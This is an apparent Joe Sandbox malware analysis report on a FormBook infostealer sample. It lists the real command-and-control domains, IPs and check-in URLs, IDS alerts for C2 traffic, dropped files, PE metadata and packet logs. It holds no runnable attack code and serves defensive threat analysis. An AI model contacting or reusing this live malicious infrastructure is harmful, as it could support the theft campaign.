                http://www.sido247.pro/073p/?GF=mlOXG&IJQ=NsdLHLYUe9sblrm3UOGRvC4p7TYTQZr/4RSieCn+7DwPKByw7jhxCyN0LTJMQHRDPlmDRdKjKllFY9ccUXh84wh4P+Mkk2rH6R5Xw9P/6Vdw6OeNADfEYyY=0%Avira URL Cloudsafe
                http://www.kubex.dev/o5mm/?IJQ=52ZaOoJJHsYFYpcHg+Nk6TaLHqcYp0Vxq28CYNd7tHRxqCukViCUoH1jhmN2/g+W5SkTzZJsaEIA3pVY9O1vDo3OOfdhA/KFz3DOpUouoe/3RRH1ei5BFqs=&GF=mlOXG0%Avira URL Cloudsafe
                http://www.kubex.dev/o5mm/0%Avira URL Cloudsafe
                http://www.glowups.life/dheh/0%Avira URL Cloudsafe
                http://www.glowups.life/dheh/?IJQ=6JcMAOZ0kkEuPLPrHoW/FblxSw+tVU6K5Nqk+SkmZf4Wc9f19ayTyDmVFSf9h78jkWY5XnirO34u2f/fghaoXyr8Ye4/fwyHnaYezOVMQq/814mWJNreSyQ=&GF=mlOXG0%Avira URL Cloudsafe
                http://www.glowups.life0%Avira URL Cloudsafe
                http://www.sido247.pro/073p/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                88rtp.biz
                		172.96.191.39
                		truetrue
                  		unknown
                  www.kubex.dev
                  		217.160.0.183
                  		truetrue
                    		unknown
                    s-part-0017.t-0009.t-msedge.net
                    		13.107.246.45
                    		truefalse
                      		high
                      sido247.pro
                      		84.32.84.32
                      		truetrue
                        		unknown
                        www.glowups.life
                        		209.74.79.42
                        		truetrue
                          		unknown
                          241.42.69.40.in-addr.arpa
                          		unknown
                          		unknownfalse
                            		high
                            www.sido247.pro
                            		unknown
                            		unknownfalse
                              		unknown
                              www.88rtp.biz
                              		unknown
                              		unknownfalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.88rtp.biz/oz0e/?GF=mlOXG&IJQ=N0iBPOr2h1wf3hrnovRBb1Y/GOEfnc+lKlX+67l0LxDwIz/NET6JyzkCPnJBSBJZztg4pX1Iwr0Nd76JZuhGaj9BaNcemEVJE4if1Cf0Ux8WzxQbGzZtN58=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sido247.pro/073p/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.glowups.life/dheh/?IJQ=6JcMAOZ0kkEuPLPrHoW/FblxSw+tVU6K5Nqk+SkmZf4Wc9f19ayTyDmVFSf9h78jkWY5XnirO34u2f/fghaoXyr8Ye4/fwyHnaYezOVMQq/814mWJNreSyQ=&GF=mlOXGtrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.kubex.dev/o5mm/?IJQ=52ZaOoJJHsYFYpcHg+Nk6TaLHqcYp0Vxq28CYNd7tHRxqCukViCUoH1jhmN2/g+W5SkTzZJsaEIA3pVY9O1vDo3OOfdhA/KFz3DOpUouoe/3RRH1ei5BFqs=&GF=mlOXGtrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.kubex.dev/o5mm/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sido247.pro/073p/?GF=mlOXG&IJQ=NsdLHLYUe9sblrm3UOGRvC4p7TYTQZr/4RSieCn+7DwPKByw7jhxCyN0LTJMQHRDPlmDRdKjKllFY9ccUXh84wh4P+Mkk2rH6R5Xw9P/6Vdw6OeNADfEYyY=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.glowups.life/dheh/true
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://ac.ecosia.org/autocomplete?q=cacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/chrome_newtabcacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=cacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.ecosia.org/newtab/cacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cacls.exe, 00000008.00000002.2624889998.0000000007EE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.glowups.lifejCNfinsYqEsIM.exe, 00000009.00000002.2620141085.0000000001623000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                209.74.79.42
                                                		www.glowups.lifeUnited States
                                                		31744MULTIBAND-NEWHOPEUStrue
                                                172.96.191.39
                                                		88rtp.bizCanada
                                                		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                84.32.84.32
                                                		sido247.proLithuania
                                                		33922NTT-LT-ASLTtrue
                                                217.160.0.183
                                                		www.kubex.devGermany
                                                		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                General Information

                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1588298
                                                Start date and time:2025-01-10 23:39:23 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 8m 19s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:11
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:hgq5nzWJll.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:2b237db9c22328f7ca27581fb777ba32c7352c81c61880c0f0d226e6663556dc.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@5/4
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 95%
                                                • Number of executed functions: 200
                                                • Number of non-executed functions: 302
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.23.242.162, 20.12.23.50, 40.69.42.241
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target jCNfinsYqEsIM.exe, PID 7096 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                17:40:26API Interceptor1x Sleep call for process: hgq5nzWJll.exe modified
                                                17:42:01API Interceptor83x Sleep call for process: cacls.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                209.74.79.42J1VpshZJfm.exeGet hashmaliciousFormBookBrowse
                                                • www.valuault.store/nhb9/
                                                NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                • www.valuault.store/nhb9/
                                                zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                • www.glowups.life/o8f4/
                                                SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                • www.primespot.live/icu6/
                                                Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                • www.glowups.life/dheh/
                                                72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                • www.primespot.live/b8eq/
                                                172.96.191.39fJD7ivEnzm.exeGet hashmaliciousFormBookBrowse
                                                • www.bola88site.one/3qit/
                                                jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                • www.bola88site.one/3qit/
                                                CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                • www.bola88site.one/3qit/
                                                CYTAT.exeGet hashmaliciousFormBookBrowse
                                                • www.bola88site.one/3qit/
                                                Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                • www.bola88site.one/3qit/
                                                PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                • www.bola88site.one/3qit/
                                                PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                • www.bola88site.one/3qit/
                                                PO2-2401-0016 (TR).exeGet hashmaliciousFormBookBrowse
                                                • www.bola88site.one/3lkx/
                                                Purchase Order TE- 00011-7777.exeGet hashmaliciousFormBookBrowse
                                                • www.bola88site.one/3lkx/
                                                Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                                                • www.bola88site.one/3lkx/
                                                84.32.84.32NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                • www.appsolucao.shop/qt4m/
                                                ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                • www.absseguridad.online/3io6/
                                                zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                • www.absseguridad.online/vekd/
                                                PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                • www.promocao.info/zaz4/
                                                Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                • www.nosolofichas.online/hqr6/
                                                Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                • www.nosolofichas.online/hqr6/
                                                inv#12180.exeGet hashmaliciousFormBookBrowse
                                                • www.promocao.info/zaz4/
                                                z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                • www.promocao.info/iiuy/
                                                profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                • www.techmiseajour.net/jytl/
                                                ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                • www.appsolucao.shop/qt4m/

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                www.kubex.devPp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                • 217.160.0.183
                                                www.glowups.lifezE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.79.42
                                                Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.79.42
                                                s-part-0017.t-0009.t-msedge.netDdj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 13.107.246.45
                                                WN9uCxgU1T.exeGet hashmaliciousUnknownBrowse
                                                • 13.107.246.45
                                                Full-Ver_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                • 13.107.246.45
                                                Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 13.107.246.45
                                                Qz8OEUxYuH.exeGet hashmaliciousFormBookBrowse
                                                • 13.107.246.45
                                                ztcrKv3zFz.exeGet hashmaliciousFormBookBrowse
                                                • 13.107.246.45
                                                gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                • 13.107.246.45
                                                3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                • 13.107.246.45
                                                rComprobante_swift_8676534657698632.exeGet hashmaliciousAgentTeslaBrowse
                                                • 13.107.246.45
                                                6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                • 13.107.246.45

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                NTT-LT-ASLTNFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                • 84.32.84.32
                                                ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                • 84.32.84.32
                                                zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                • 84.32.84.32
                                                armv5l.elfGet hashmaliciousUnknownBrowse
                                                • 84.32.26.92
                                                DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                • 84.32.84.32
                                                PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                • 84.32.84.32
                                                UpdaterTool.exeGet hashmaliciousUnknownBrowse
                                                • 84.32.84.152
                                                Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                • 84.32.84.32
                                                Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                • 84.32.84.32
                                                inv#12180.exeGet hashmaliciousFormBookBrowse
                                                • 84.32.84.32
                                                MULTIBAND-NEWHOPEUS5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.107
                                                gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.79.40
                                                0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.107
                                                NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.107
                                                9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.79.41
                                                OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.107
                                                J1VpshZJfm.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.79.42
                                                NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.79.42
                                                zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.79.42
                                                KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.109
                                                LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGmpsl.elfGet hashmaliciousMiraiBrowse
                                                • 209.58.183.0
                                                http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450Get hashmaliciousUnknownBrowse
                                                • 209.58.171.123
                                                https://hdtodayz.to/movie/watch-the-shawshank-redemption-hd-19679Get hashmaliciousHTMLPhisherBrowse
                                                • 64.120.110.173
                                                SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                • 172.96.191.150
                                                Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                • 172.96.191.39
                                                exe009.exeGet hashmaliciousEmotetBrowse
                                                • 172.96.190.154
                                                8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                • 103.150.10.48
                                                7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                • 103.150.10.48
                                                UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                • 103.150.10.48
                                                1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                • 103.150.10.48

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hgq5nzWJll.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\hgq5nzWJll.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                C:\Users\user\AppData\Local\Temp\G8uE-69OL

                                                Download File
                                                Process:C:\Windows\SysWOW64\cacls.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                Category:dropped
                                                Size (bytes):196608
                                                Entropy (8bit):1.1209935793793442
                                                Encrypted:false
                                                SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.705123922782494
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:hgq5nzWJll.exe
                                                File size:804'352 bytes
                                                MD5:649587a22d4d6da8d4f7aa2c2d4a195e
                                                SHA1:7830a95bf645b1bce599e4c3ffb7ca2c74756d0a
                                                SHA256:2b237db9c22328f7ca27581fb777ba32c7352c81c61880c0f0d226e6663556dc
                                                SHA512:cc8a91b4b27311f6427562a41207711e0cea248ce28b1d70b7f191ee09d7f9f8f6c3e9ad0bef5c6733842de3b080ecb5343c090786b9be1b9451d3afacd5abf7
                                                SSDEEP:12288:EKJzdY9shQgqL08bCVUNPJneQbcV4yUbBnpYrppppQHluarcifXWFIPs4T5d:Zdhl8qUVleQbi4yUtpYrLpQlPNWhkv
                                                TLSH:C4050154AB5DC417C99416348EA0F6B926689E8DF912D207AFDCBFAF3C72B151C482C3
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....WVg..............0......(.......9... ...@....@.. ....................................@................................

                                                File Icon

                                                Icon Hash:17692632b3936907

                                                Static PE Info

                                                General

                                                Entrypoint:0x4c39ba
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x67565799 [Mon Dec 9 02:36:09 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                push ebx
                                                add byte ptr [ecx+00h], bh
                                                jnc 00007F78350B5CD2h
                                                je 00007F78350B5CD2h
                                                add byte ptr [ebp+00h], ch
                                                add byte ptr [ecx+00h], al
                                                arpl word ptr [eax], ax
                                                je 00007F78350B5CD2h
                                                imul eax, dword ptr [eax], 00610076h
                                                je 00007F78350B5CD2h
                                                outsd
                                                add byte ptr [edx+00h], dh
                                                push ebx
                                                add byte ptr [ecx+00h], bh
                                                jnc 00007F78350B5CD2h
                                                je 00007F78350B5CD2h
                                                add byte ptr [ebp+00h], ch
                                                add byte ptr [edx+00h], dl
                                                add byte ptr [esi+00h], ah
                                                insb
                                                add byte ptr [ebp+00h], ah
                                                arpl word ptr [eax], ax
                                                je 00007F78350B5CD2h
                                                imul eax, dword ptr [eax], 006E006Fh
                                                add byte ptr [ecx+00h], al
                                                jnc 00007F78350B5CD2h
                                                jnc 00007F78350B5CD2h
                                                add byte ptr [ebp+00h], ch
                                                bound eax, dword ptr [eax]
                                                insb
                                                add byte ptr [ecx+00h], bh
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                dec esp
                                                add byte ptr [edi+00h], ch
                                                popad
                                                add byte ptr [eax+eax+00h], ah
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc39680x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x2494.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc80000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xc1a200xc1c0035603514417df5e604957cdaeb593150False0.905703125data7.710588369204003IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0xc40000x24940x2600fed7c7f0f8a44c65d72bd2bc79978a38False0.8696546052631579data7.403758693212629IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xc80000xc0x20074c0728e537c349cb7275fb4eeb075ddFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0xc41000x1e7ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9827056110684089
                                                RT_GROUP_ICON0xc5f900x14data1.05
                                                RT_VERSION0xc5fb40x2e0data0.45108695652173914
                                                RT_MANIFEST0xc62a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2025-01-10T23:41:40.204392+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1161137172.96.191.3980TCP
                                                2025-01-10T23:41:55.972794+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1161138217.160.0.18380TCP
                                                2025-01-10T23:41:58.527321+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1161139217.160.0.18380TCP
                                                2025-01-10T23:42:01.070117+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1161140217.160.0.18380TCP
                                                2025-01-10T23:42:03.718484+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1161141217.160.0.18380TCP
                                                2025-01-10T23:42:09.264886+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.116114284.32.84.3280TCP
                                                2025-01-10T23:42:11.813056+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.116114384.32.84.3280TCP
                                                2025-01-10T23:42:14.354373+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.116114484.32.84.3280TCP
                                                2025-01-10T23:42:16.904651+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.116114584.32.84.3280TCP
                                                2025-01-10T23:42:22.695709+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1161146209.74.79.4280TCP
                                                2025-01-10T23:42:25.226145+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1161147209.74.79.4280TCP
                                                2025-01-10T23:42:27.739930+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1161148209.74.79.4280TCP
                                                2025-01-10T23:42:30.308315+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1161149209.74.79.4280TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 10, 2025 23:40:55.072685003 CET6105653192.168.2.11162.159.36.2
                                                Jan 10, 2025 23:40:55.077505112 CET5361056162.159.36.2192.168.2.11
                                                Jan 10, 2025 23:40:55.081361055 CET6105653192.168.2.11162.159.36.2
                                                Jan 10, 2025 23:40:55.086206913 CET5361056162.159.36.2192.168.2.11
                                                Jan 10, 2025 23:40:55.527443886 CET6105653192.168.2.11162.159.36.2
                                                Jan 10, 2025 23:40:55.532555103 CET5361056162.159.36.2192.168.2.11
                                                Jan 10, 2025 23:40:55.532819986 CET6105653192.168.2.11162.159.36.2
                                                Jan 10, 2025 23:41:39.273493052 CET6113780192.168.2.11172.96.191.39
                                                Jan 10, 2025 23:41:39.278484106 CET8061137172.96.191.39192.168.2.11
                                                Jan 10, 2025 23:41:39.278572083 CET6113780192.168.2.11172.96.191.39
                                                Jan 10, 2025 23:41:39.289041042 CET6113780192.168.2.11172.96.191.39
